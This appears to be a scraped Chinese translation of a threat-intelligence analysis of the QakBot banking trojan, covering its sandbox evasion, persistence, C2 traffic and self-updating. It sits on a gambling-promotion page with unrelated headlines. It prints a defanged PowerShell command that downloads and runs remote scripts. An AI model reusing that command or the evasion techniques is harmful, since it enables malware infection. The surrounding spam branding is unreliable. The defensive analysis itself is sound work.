太阳集团2138备用网址

  • 2019-06-26
  • [加油!向未来]国产大飞机C919遇严峻考验 机翼被“虐”向上弯曲3米 2019-06-26
  • “新四大发明”火了!中国与世界有了新的沟通桥梁 2019-06-26
  • 《都挺好》曝光终极预告 直击当代家庭“痛点” 2019-06-26
  • 2019-06-26
  • 2019-06-26
  • 7月可乘直升机游览青海湖 2019-06-26
  • 2019-06-26
  • 培华学院召开新闻信息培训暨表彰大会 2019-06-26
  • 吉林师范大学《见地》摄影比赛作品选登 2019-06-26
  • 广州南沙工商企业获得电力暖心服务 2019-06-26
  • 张兴海:汽车新制造是全生命周期的新的制造理念和体系 2019-06-21
  • 2019年03月08日 星期五 2019-06-21
  • 【红人馆】合肥摆了9年的米糕摊又小又难找 摊主竟是两位聋哑合伙人! 2019-06-21
  • 华为 Mate 7(尊爵版电信4G)评论 2019-06-21
  • 欢迎来到 黑吧太阳集团2138备用网址 是业内专业的游戏平台,为你提供各式各样的精品游戏,最全的游戏项目,同时还为您提供各种游戏专题游戏攻略人气论坛。

    仔细研究为什么QakBot恶意软件如此危险

    来源:本站整理 作者:佚名 时间:2019-02-28 TAG: 我要投稿

    太阳集团2138备用网址 www.r-island.com Cofense Intelligence ™最近报告了一项分发QakBot恶意软件的网络钓鱼活动。QakBot感染是一个重大威胁,因此请务必与SOC分析人员分享今天的后续帖子。
    我们将深入探讨QakBot用于阻碍检测和手动分析的新技术。Cofense™看到这种复杂的银行木马通过Geodo/Emotet僵尸网络分发,使用多种工具来覆盖其痕迹并窃取凭证。开发它的威胁行为者非常具有创造性和攻击性。
    面对这种不断变化的威胁时,不能拥有弱的管理密码。为识别和预防QakBot,在自动威胁检测系统出现故障时,在整个运营中培训员工并制定计划B是值得的。
    一、细节
    Cofense Intelligence™最近报道了分发QakBot的Geodo/Emotet僵尸网络垃圾邮件活动。QakBot是一种复杂的银行木马,在某些情况下,利用先进的新技术来规避检测并保护自己免受人工分析。该过程涉及广泛的侦察和信息收集,它被QakBot公开并用于自我传播。自我传播的二进制文件保持与原始文件拥有相同的保护级别,使QakBot感染成为一个重大威胁。
    二、建立立足点
    在最近的攻击行动中,当QakBot首次运行时,它会将原始二进制文件替换为合法Windows计算器应用程序calc.exe的副本。

    图1 – 覆盖命令
    然后,它使用多种方法检查是否存在虚拟化软件,如VirtualBox,CWSandbox和VMware。这些方法包括:
    · 检查已安装的程序
    · 将进程名与预定义的黑名单进行比较
    · 检查注册表项
    · 检查硬件信息
    QakBot还通过检查可执行文件是否已重命名为研究人员常用的文件名(如mlwr_smpl,sample或artifact.exe)来尝试确定它是否在分析环境中。
    如果未检测到虚拟化软件或分析环境,QakBot会将原始可执行文件复制到%appdata%\ Microsoft \目录中的一个文件夹中。此可执行文件使用有效证书签名的形式附加伪装层,如图2所示。

    图2 – 合法证书
    证书签名者Vercoe IT Ltd是一家相对较新的公司,其签名仅在2019年1月下旬开始使用,仅用于QakBot可执行文件。鉴于QakBot有使用可疑公司证书签署其二进制文件的历史,所以Vercoe IT公司的证书值得怀疑。
    一旦可执行文件到位,QakBot就会通过两种途径来建立其持久性,设置注册表项在启动时运行可执行文件,以及一个每5个小时运行一次可执行文件的任务,如图3所示。

    图3 – 持久性机制 – 注册表和计划任务
    执行后,QakBot启动explorer.exe进程并将其代码注入进程的内存。然后,可以此进程可以用于生成代码并注入其他进程(如svchost.exe)。在某些情况下,QakBot使用的双持久性机制可以执行其他进程,如图4所示。

    图4 – 衍生的进程
    三、首次网络连接
    在执行进一步操作之前,QakBot通常会检查受感染计算机的IP地址或连接速度。通过hxxp://www[.]ip-adress[.]com检查IP地址,可以通过从hxxps://cdn[.]speedof[.]me/sample4096k[.]bin?r=0[.]%u下载文件来检查速度。该信息可以用作检查分析环境的另一种方法,并包含在最初传送的一般信息中。
    一旦通过了必要的测试,QakBot就会开始与其主要命令和控制服务器(C2)进行通信。这些通信主要包括发送到直接IP地址或受感染域名的HTTPS POST加密数据。为了传输大量数据,QakBot还有一个带有凭证的硬编码FTP服务器列表,它将尝试访问并上传包含受感染主机其他信息的文件。如果这些FTP服务器不可用或凭证不正确,QakBot将默认返回使用HTTPS POST来传输信息并进行通信。尽管FTP服务器是首选的C2,但与其他C2通信的内容没有明显差异。在QakBot与其C2建立连接之后,如果有更新的版本,它将尝试“更新”自身。更新只包括下载新的可执行文件来替换磁盘上的可执行文件。
    QakBot安排这些签到并使用“更新的”二进制文件更改磁盘上文件的哈希值,从而有助于避免检测。每个新二进制文件都会重新编译、重新加密,并在下载之前在服务器端修改部分数据。这些更新会明显改变二进制文件的结构,而不会改变其功能。QakBot二进制文件的预定更新可确保磁盘上的文件在任意长的时间段内都不会相同。缺少一致的二进制文件可防止反病毒公司生成静态签名,以便在不同的端点上使用以检测相同的恶意软件。虽然这种策略不会长期阻止检测,但它通常会留下足够的时间来生成和下载新的更新和未检测到的可执行文件。
    四、深入侦察
    QakBot的C2中提供的有效载荷还包括可用于进一步支持QakBot感染的脚本。其中一个下载的脚本如图5所示。
    powershell.exe “IEX (New-Object Net.WebClient).DownloadString(‘hxxps://onedrive[.]live[.]com/download.aspx?cid=CE32720D26AED2D5&authKey=%21AJUHblbcwLEzrrA&resid=CE32720D26AED2D5%21110&ithint=%2Eps1’);IEX (New-Object Net.WebClient).DownloadString(‘hxxps://onedrive[.]live[.]com/download.aspx?cid=CE32720D26AED2D5&authKey=%21AHHhrhk9od5OCBU&resid=CE32720D26AED2D5%21111&ithint=%2Eps1’); Invoke-MainWorker -Command ‘%s'”

    [1] [2] [3]  下一页

    【声明】:太阳集团2138备用网址(http://www.r-island.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@www.r-island.com,我们会在最短的时间内进行处理。